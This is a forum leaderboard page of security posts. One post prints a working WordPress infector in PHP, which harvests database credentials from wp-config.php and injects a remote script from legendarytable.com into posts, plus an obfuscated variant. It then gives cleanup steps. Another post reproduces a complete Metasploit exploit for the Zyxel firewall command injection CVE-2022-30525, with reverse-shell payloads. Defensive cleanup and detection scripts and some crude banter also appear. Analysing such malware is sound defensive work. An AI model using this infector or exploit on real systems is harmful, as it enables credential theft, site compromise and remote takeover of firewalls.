Leaderboard

Popular Content

Showing content with the highest reputation on 05/17/22 in all areas

  1. It's from the "Elementor" plugin. Here is the source that "infects" the toys:

         <?php
         error_reporting(0);
         ini_set('display_errors', 0);
         ini_set('max_execution_time', 0);
         echo "ssqqss>>>";
         $d = $_SERVER['DOCUMENT_ROOT'] . "/";
         $files = array();
         for ($i = 0; $i < 3; $i++) {
             try {
                 $az = shell_exec('find ' . $d . ' -name "wp-config.php"');
                 $az2 = explode("\n", $az);
                 foreach ($az2 as $file) {
                     $fil = explode("/wp-config.php", $file);
                     $fil = $fil[0] . "/wp-config.php";
                     array_push($files, $fil);
                 }
                 $d = $d . "../";
             } catch (Exception $e) {
             }
         }
         $l = "/";
         for ($i = 0; $i < 3; $i++) {
             try {
                 $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l);
                 $display = Array('php');
                 $search = Array('wp-config.php');
                 $files_ar = array();
                 foreach (new RecursiveIteratorIterator($it) as $file) {
                     if (strpos($file->getFilename(), 'wp-config.php') !== false) {
                         array_push($files, $file->getPathname());
                     }
                 }
                 $l .= "../";
             } catch (Exception $e) {
             }
         }
         $files = array_unique($files);
         foreach ($files as $file) {
             make_index_blog($file);
         }
         die();

         function get_var_reg($pat, $text) {
             if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) {
                 return $matches[1][0];
             }
             return "";
         }

         function getijstonemoretime($path) {
         }

         function make_index_blog($path) {
             echo "iii->>try:" . $path . "<br />";
             $az = shell_exec('cat ' . $path);
             if (strpos($az, "DB_PASSWORD") !== false) {
             } else {
             }
             if (strpos($az, "DB_PASSWORD") !== false) {
                 sqldo($az);
             }
         }

         function sqldo($content) {
             $siteurl = "null";
             if (strpos($content, "DB_NAME") !== false) {
                 $db = get_var_reg("DB_NAME['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
                 $host = get_var_reg("DB_HOST['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
                 $user = get_var_reg("DB_USER['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
                 $pass = get_var_reg("DB_PASSWORD['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
                 $conn = new mysqli($host, $user, $pass);
                 if ($conn->connect_error) {
                     echo $conn->connect_error;
                 } else {
                     $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'";
                     $result = $conn->query($q) or die($conn->error);
                     while ($row = $result->fetch_assoc()) {
                         $result5 = $conn->query("SHOW COLUMNS FROM " . $db . "." . $row["TABLE_NAME"] . " LIKE 'option_name'");
                         if ($result5->num_rows > 0) {
                             $q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " where option_name='siteurl' LIMIT 1 ";
                             $result2 = $conn->query($q2) or var_dump($conn->error);
                             while ($row2 = $result2->fetch_assoc()) {
                                 $val = $row2['option_value'];
                                 $siteurl = $val;
                                 echo "iii->>find222:" . $siteurl . "<br />";
                                 if (strpos($siteurl, "://") !== false) {
                                     $k = file_get_contents($siteurl);
                                     if (strpos($k, "legendarytable") !== false) {
                                         echo "iii->>contains:" . $siteurl . "<br />";
                                     } else {
                                         $q9 = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%posts%'";
                                         $result9 = $conn->query($q9) or die($conn->error);
                                         while ($row9 = $result9->fetch_assoc()) {
                                             $q8 = "SELECT post_content FROM " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " LIMIT 1 ";
                                             $result8 = $conn->query($q8) or var_dump($conn->error);
                                             while ($row8 = $result8->fetch_assoc()) {
                                                 $val8 = $row8['post_content'];
                                                 if (strpos($val8, "legendarytable") === false) {
                                                     $q3 = "UPDATE " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%legendarytable%'";
                                                     $conn->query($q3);
                                                     echo "iii->>" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />";
                                                 } else {
                                                     echo "iii->>222ALREADY:" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />";
                                                 }
                                             }
                                         }
                                     }
                                 }
                             }
                         }
                     }
                 }
                 $conn->close();
             }
             return $siteurl;
         }

         function search_file_index($dir, $file_to_search) {
             $files = @scandir($dir);
             if ($files == false) {
                 $dir = substr($dir, 0, -3);
                 if (strpos($dir, '../') !== false) {
                     search_file_index($dir, $file_to_search);
                     return;
                 }
                 if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
                     search_file_index($dir, $file_to_search);
                     return;
                 }
             }
             foreach ($files as $key => $value) {
                 $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
                 if (!is_dir($path)) {
                     if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {
                         make_index_upload($path);
                     }
                 } else if ($value != "." && $value != "..") {
                     search_file_index($path, $file_to_search);
                 }
             }
         }

     In the files, another version (the one with the cookie check) looks like this:

         $v=chr(112).chr(114).chr(101).chr(103).chr(95).chr(109).chr(97).chr(116).chr(99).chr(104);
         if(!$v(chr(35).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).
         chr(95).chr(97).chr(100).chr(109).chr(105).chr(110).chr(124).chr(119).chr(112).chr(45).
         chr(115).chr(101).chr(116).chr(116).chr(105).chr(110).chr(103).chr(115).chr(124).chr(119).
         chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr(108).
         chr(111).chr(103).chr(103).chr(101).chr(100).chr(35).chr(105),implode(" ",array_keys($_COOKIE)))){echo
         chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).
         chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).
         chr(58).chr(47).chr(47).chr(116).chr(114).chr(105).chr(99).chr(107).chr(46).chr(108).
         chr(101).chr(103).chr(101).chr(110).chr(100).chr(97).chr(114).chr(121).chr(116).chr(97).
         chr(98).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(101).
         chr(119).chr(115).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(54).chr(46).
         chr(51).chr(46).chr(50).chr(39).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).
         chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).
         chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(62).chr(60).chr(47).
         chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62);}

     To verify the checksums of the core files, I recommend wp-cli. Example:

         ./wp --allow-root core verify-checksums
         Warning: File doesn't verify against checksum: wp-login.php
         Warning: File doesn't verify against checksum: wp-admin/index.php
         Warning: File doesn't verify against checksum: wp-admin/admin.php
         Warning: File doesn't verify against checksum: wp-admin/admin-ajax.php
         Warning: File should not exist: wp-admin/try.php
         Error: WordPress installation doesn't verify against checksums.

     It should come out like this:

         ./wp --allow-root core verify-checksums
         Success: WordPress installation verifies against checksums.

     The scripts also need to be removed from the posts (wp_posts). They can be identified very easily with a MySQL query:

         select * from wp_posts where post_content like '%news.js%';

     They can also be removed from wp_posts using replace. Note here that there can be several versions. You can extend the search to %script% and/or legendarytable and then run replace on whatever is necessary:

         update wp_posts set post_content = replace(post_content, "<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>", "");

     There is yet another version that installs 2 plugins (inactive) through which they can run various things. Another version checks cookies. Where cookies exist, it does not redirect to other sites. It targets only new visitors, whom it redirects.

     Advice:
       1. Stop installing every crappy plugin out there
       2. Use Content-Security-Policy, damn it! :)))
    4 points
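The cleanup step from the post above, generalised so that one pass catches every variant of the injected tag (any subdomain, any `?v=` value, either quote style) instead of one exact string. This is an added example, not code from the original post; `clean_post`, `audit` and the sample rows are assumptions made for illustration, and the rows are constructed.

```python
import re

# Domain from the samples in the post; subdomain, path and ?v= differ per variant.
INJECTED_DOMAIN = "legendarytable.com"
# The literal string used in the post's UPDATE ... REPLACE statement.
EXACT_FROM_POST = ("<script src='https://jack.legendarytable.com/news.js?v=1.9.9' "
                   "type='text/javascript'></script>")

# One whole <script src=...> element whose host is the domain or a subdomain of it:
# either quote style, any attribute order, any path or query string.
SCRIPT_RE = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*(['\"])\s*(?:https?:)?//"
    r"(?:[a-z0-9-]+\.)*" + re.escape(INJECTED_DOMAIN) +
    r"(?::\d+)?(?:[/?#][^'\"]*)?\1[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)

def clean_post(content):
    """Return (cleaned_content, removed_tags) for one post_content value."""
    removed = [m.group(0) for m in SCRIPT_RE.finditer(content)]
    return SCRIPT_RE.sub("", content), removed

def audit(rows):
    """rows: iterable of (post_id, post_content); returns hits only."""
    report = {}
    for post_id, content in rows:
        cleaned, removed = clean_post(content)
        if removed:
            report[post_id] = {"cleaned": cleaned, "removed": removed}
    return report

# Constructed rows standing in for an export of wp_posts (ID, post_content).
SAMPLE_ROWS = [
    (1, "<p>Hello</p>" + EXACT_FROM_POST),
    (2, '<p>Hi</p><script type="text/javascript" '
        'src="https://trick.legendarytable.com/news.js?v=6.3.2"></script>'),
    (3, "<p>A post that only mentions news.js and legendarytable in prose</p>"),
    (4, "<script src='https://cdn.example.org/app.js'></script><p>ok</p>"),
]

if __name__ == "__main__":
    for post_id, hit in audit(SAMPLE_ROWS).items():
        print(post_id, hit["removed"])
```

Row 2 is the case the exact-string `replace` leaves behind, and row 3 is the case a plain `LIKE '%legendarytable%'` search would flag even though it carries no script tag.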
  2. It would be cool to be able to tag the police on the forum. And the SRI guys too, you come in here like cockroaches around the district heating pipes :))))))
    3 points
  3. The Blowjob script got activated :)))) What a bunch of morons, man
    2 points
  4. You bastards, that's why I got a fine for parking my car wrong: you couldn't do anything to me on the forum, so you got me on the parking.
    2 points
  5. Nothing new under the sun... just a small refresher on how the world works 😂 Why do I say "the world"? I doubt there are countries where this isn't practiced... only the level and the sums differ
    1 point
  6. Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic. This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice. The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects. In some instances, unsuspecting users are taken to a rogue redirect landing page containing a fake CAPTCHA check, clicking which serves unwanted ads that are disguised to look as if they come from the operating system and not from a web browser. The campaign — a continuation of another wave that was detected last month — is believed to have impacted 322 websites so far, starting May 9. The April set of attacks, on the other hand, has breached over 6,500 websites. Source
    1 point
  7. URLs: https://cvetrends.com/ https://cve.circl.lu/ Source: https://github.com/4D0niiS/CVE-Tracker
    1 point
  8. This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below.

         ##
         # This module requires Metasploit: https://metasploit.com/download
         # Current source: https://github.com/rapid7/metasploit-framework
         ##

         class MetasploitModule < Msf::Exploit::Remote
           Rank = ExcellentRanking

           prepend Msf::Exploit::Remote::AutoCheck
           include Msf::Exploit::Remote::HttpClient
           include Msf::Exploit::CmdStager

           def initialize(info = {})
             super(
               update_info(
                 info,
                 'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',
                 'Description' => %q{
                   This module exploits CVE-2022-30525, an unauthenticated remote
                   command injection vulnerability affecting Zyxel firewalls with zero
                   touch provisioning (ZTP) support. By sending a malicious setWanPortSt
                   command containing an mtu field with a crafted OS command to the
                   /ztp/cgi-bin/handler page, an attacker can gain remote command execution
                   as the nobody user.

                   Affected Zyxel models are:

                   * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
                   * USG20-VPN and USG20W-VPN using firmware 5.21 and below
                   * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below
                 },
                 'License' => MSF_LICENSE,
                 'Author' => [
                   'jbaines-r7' # Vulnerability discovery and Metasploit module
                 ],
                 'References' => [
                   [ 'CVE', '2022-30525' ],
                   [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']
                 ],
                 'DisclosureDate' => '2022-04-28',
                 'Platform' => ['unix', 'linux'],
                 'Arch' => [ARCH_CMD, ARCH_MIPS64,],
                 'Privileged' => false,
                 'Targets' => [
                   [
                     'Shell Dropper',
                     {
                       'Platform' => 'unix',
                       'Arch' => ARCH_CMD,
                       'Type' => :unix_cmd,
                       'DefaultOptions' => {
                         'PAYLOAD' => 'cmd/unix/reverse_bash'
                       }
                     }
                   ],
                   [
                     'Linux Dropper',
                     {
                       'Platform' => 'linux',
                       'Arch' => [ARCH_MIPS64],
                       'Type' => :linux_dropper,
                       'CmdStagerFlavor' => [ 'curl', 'wget' ],
                       'DefaultOptions' => {
                         'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
                       }
                     }
                   ]
                 ],
                 'DefaultTarget' => 0,
                 'DefaultOptions' => {
                   'RPORT' => 443,
                   'SSL' => true
                 },
                 'Notes' => {
                   'Stability' => [CRASH_SAFE],
                   'Reliability' => [REPEATABLE_SESSION],
                   'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
                 }
               )
             )
             register_options([
               OptString.new('TARGETURI', [true, 'Base path', '/'])
             ])
           end

           # Checks the build date that is embedded in the landing page. If it finds a build
           # date older than April 20, 2022 then it will additionally check if the model is
           # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this
           # seems like a reasonable approach.
           def check
             res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))
             unless res
               return CheckCode::Unknown('The target failed to respond to check.')
             end

             unless res.code == 200
               return CheckCode::Safe('Failed to retrieve /')
             end

             ver = res.body[/favicon\.ico\?v=(?<build_date>[0-9]{6,})/, :build_date]
             if ver.nil?
               return CheckCode::Safe('Could not extract a version number')
             end

             if ver[0..5].to_i < 220420
               model = res.get_html_document.xpath('//title').text
               if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))
                 return CheckCode::Appears("This was determined by the model and build date: #{model}, #{ver}")
               end
             end

             CheckCode::Safe("This determination is based on the build date string: #{ver}.")
           end

           def execute_command(cmd, _opts = {})
             handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')
             print_status("Sending command to #{handler_uri}")

             # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too
             # but it's more involved.
             http_payload = {
               'command' => 'setWanPortSt',
               'proto' => 'dhcp',
               'port' => Rex::Text.rand_text_numeric(4).to_s,
               'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,
               'vlanid' => Rex::Text.rand_text_numeric(4).to_s,
               'mtu' => ";#{cmd};",
               'data' => ''
             }

             res = send_request_cgi({
               'method' => 'POST',
               'uri' => handler_uri,
               'headers' =>
               {
                 'Content-Type' => 'application/json; charset=utf-8'
               },
               'data' => http_payload.to_json
             })

             # Successful exploitation can result in no response (connection being held open by a reverse shell)
             # or, if the command executes immediately, a response with a 503.
             if res && res.code != 503
               fail_with(Failure::UnexpectedReply, "The target replied with HTTP status #{res.code}. No reply was expected.")
             end
             print_good('Command successfully executed.')
           end

           def exploit
             print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
             case target['Type']
             when :unix_cmd
               execute_command(payload.encoded)
             when :linux_dropper
               execute_cmdstager
             end
           end
         end

         # 0day.today [2022-05-17] #

     Source
    1 point
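A detection-side check for the request described in the module text above: a POST to /ztp/cgi-bin/handler carrying a setWanPortSt command whose mtu field is not a plain number. This is an added example, not part of the module or the original post; it assumes method, path and body are available from a TLS-terminating proxy or a capture, the function names and sample requests are constructed, and it covers only the mtu field (the module's own comment notes that `data` is a usable vector too).

```python
import json
import posixpath
import re

HANDLER_PATH = "/ztp/cgi-bin/handler"  # endpoint named in the module description
NUMERIC_MTU = re.compile(r"[0-9]{1,5}")

def inspect_ztp_request(method, path, body):
    """Return a reason string when a request matches the pattern, else None."""
    # Drop the query string and normalise, so '//ztp/./cgi-bin/handler?x=1' still matches.
    clean = posixpath.normpath("/" + path.split("?", 1)[0].lstrip("/"))
    if method.upper() != "POST" or clean != HANDLER_PATH:
        return None
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return "ZTP handler request with a body that is not valid JSON"
    if not isinstance(doc, dict) or doc.get("command") != "setWanPortSt":
        return None
    mtu = doc.get("mtu")
    if mtu is None or (isinstance(mtu, int) and not isinstance(mtu, bool)):
        return None
    if isinstance(mtu, str) and NUMERIC_MTU.fullmatch(mtu):
        return None
    return "setWanPortSt with non-numeric mtu value %r" % (mtu,)

def scan(requests):
    """requests: iterable of (source, method, path, body); returns flagged entries."""
    findings = []
    for source, method, path, body in requests:
        reason = inspect_ztp_request(method, path, body)
        if reason:
            findings.append((source, reason))
    return findings

# Constructed requests; 192.0.2.0/24 is a documentation range and "<cmd>" a placeholder.
SAMPLE_REQUESTS = [
    ("192.0.2.10", "POST", "/ztp/cgi-bin/handler",
     '{"command": "setWanPortSt", "proto": "dhcp", "mtu": "1500", "data": ""}'),
    ("192.0.2.66", "POST", "/ztp/cgi-bin/handler",
     '{"command": "setWanPortSt", "proto": "dhcp", "mtu": ";<cmd>;", "data": ""}'),
    ("192.0.2.67", "post", "//ztp/./cgi-bin/handler?x=1",
     '{"command": "setWanPortSt", "mtu": "1500;<cmd>"}'),
    ("192.0.2.11", "GET", "/", ""),
]

if __name__ == "__main__":
    for source, reason in scan(SAMPLE_REQUESTS):
        print(source, reason)
```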
  9. Good idea. With the GeoIP mod for Apache:

         GeoIPEnable On
         # God, screw you all and we're rid of the trouble :))
         SetEnvIf GEOIP_COUNTRY_CODE CN BlockCountry
         SetEnvIf GEOIP_COUNTRY_CODE RU BlockCountry
         SetEnvIf GEOIP_COUNTRY_CODE UA BlockCountry
         SetEnvIf GEOIP_COUNTRY_CODE IN BlockCountry
         <RequireAll>
             Require all granted
             Require not env BlockCountry
         </RequireAll>
    1 point